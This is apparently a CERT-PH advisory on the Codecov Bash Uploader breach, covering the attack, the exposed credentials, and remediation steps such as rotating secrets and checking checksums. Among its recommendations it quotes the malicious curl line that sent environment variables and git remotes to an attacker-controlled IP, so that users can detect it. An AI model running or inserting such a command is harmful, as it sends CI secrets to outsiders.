Codecov has disclosed and acknowledged that it suffered a data breach that can potentially be chained to launch attacks on their customers. Codecov is a company that sells and provides solutions that integrate tools for developers to gain actionable visibility into their source code, also known as Code Coverage. This helps developers in measuring how much of the source code executes during testing and identifies any undetected bugs. According to the company, the initial attack occurred on January of this year, wherein threat actors had gained access to its Docker image creation process and extracted the credentials needed to access and modify the company’s Bash Uploader and other internal systems, including Codecov CircleCI Orb, Codecov-actions uploader for GitHub and the Codecov Bitrise Step.

______________________________

A. Nature of Attack

Description of the attack:

Threat actors targeted and modified a version of the Bash Uploader, a tool primarily used to send code coverage reports to the Codecov’s platform, to export information subject to continuous integration (CI) from customers’ environment to an attacker-controlled-server outside of Codecov’s infrastructure. Threat actor could then potentially affect and gain access to the following:

  • Any credentials, tokens, or keys that customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed
  • Any services, datastores, and application code that could be accessed with the given credentials, tokens, or keys
  • The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI

______________________________

B. Actions to be Taken

CERT-PH recommends the following actions be taken:

  • Affected users immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that relied on Bash Uploader.
  • Users are highly advised to check the bash script for any line that contains “curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://<attacker_ip>/upload/v2 || true” and immediately replace the bash files with the most recent version from https://codecov.io/bash.
  • Additionally, locally stored version of a Bash Uploader must be check for the said line and immediately replace the bash files with the latest version
  • On-premise versions of Codecov are  unlikely to be impacted since it fetches the Bash Uploader to your self-hosted Codecov installation. However, you can verify where you are fetching the Bash Uploader by looking at your CI pipeline configuration.
  • Users that conduct a checksum comparison before using the Bash Uploaders as part of their CI processes are not impacted by this issue.
  • For additional information regarding the issue, kindly refer to the official Security Update of Codecov (https://about.codecov.io/security-update/)

______________________________

C. Conclusion

In conclusion, organizations and businesses, both private and public, that use Codecov’s Bash Uploader must update their bash scripts from their official repositories, perform mitigation steps and additional measures to secure their assets. Closely monitor and observe any identified assets until the issue is fully resolved.